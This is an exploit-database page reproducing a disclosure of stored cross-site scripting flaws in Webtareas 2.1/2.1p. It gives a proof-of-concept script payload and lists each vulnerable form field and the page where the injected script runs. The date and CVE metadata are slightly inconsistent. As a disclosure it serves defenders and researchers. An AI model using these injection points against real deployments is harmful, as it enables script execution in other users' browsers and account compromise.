Webtareas 2.1 / 2.1p Cross Site Scripting
CVE
Category
Price
Severity
CVE-2021-38733
CWE-79
Not specified
Medium
Author
Risk
Exploitation Type
Date
Hacker-one
Medium
Remote
2020-07-12
CPE
cpe:cpe:/a:webtareas:webtareas:2.1.2.1
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070056 Below is a copy:
Webtareas 2.1 / 2.1p Cross Site Scripting #Author: AppleBois
#Homepage: https://sourceforge.net/projects/webtareas/
#Affected Version: 2.1/2.1p
#Stored XSS
#Allows an attacker to execute arbitrary HTML and JavaScript code
#More info : https://medium.com/@tehwinsam/webtareas-2-1-c8b406c68c2a
#Solutions: "NONE"
Payload = <script>alert(AppleBois);</script>
Vulnerable page :/webtareas/clients/editclient.php
Vulnerable Input Tab : Name , City, Country, Phone, Fax
Vulnerable page :/webtareas/extensions/addextension.php?
Vulnerable Input Tab: Title
Trigger Page:/Tareas/webtareas/extensions/viewextension.php?id=1&borne1=0
Vulnerable page :/webtareas/administration/add_announcement.php?Vulnerable Input Tab: Subject
Trigger Page: /webtareas/general/newnotifications.php
Vulnerable page :/webtareas/administration/departments.php?mode=add Vulnerable Input Tab:Name printed
Trigger Page:/webtareas/administration/departments.php
Vulnerable page :/webtareas/administration/locations.php?mode=add Vulnerable Input Tab: Name printed
Trigger Page:/webtareas/administration/locations.php?mode=list&msg=add#locAnchor
Vulnerable page :/webtareas/expenses/claim_type.php?mode=add#eExAnchor
Vulnerable Input Tab: Name printed
Trigger Page: /webtareas/expenses/editexpense.php?recurring=&project=0
Vulnerable page :/webtareas/projects/editproject.php
Vulnerable Input Tab : Name
Trigger Page: /webtareas/projects/viewproject.php?id={depend on the id of project}&msg=add#epDAnchor
Vulnerable page :/webtareas/general/newnotifications.php
*Trigger when <script>alert(AppleBois);</script> is found on Recent Visited Pages*
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum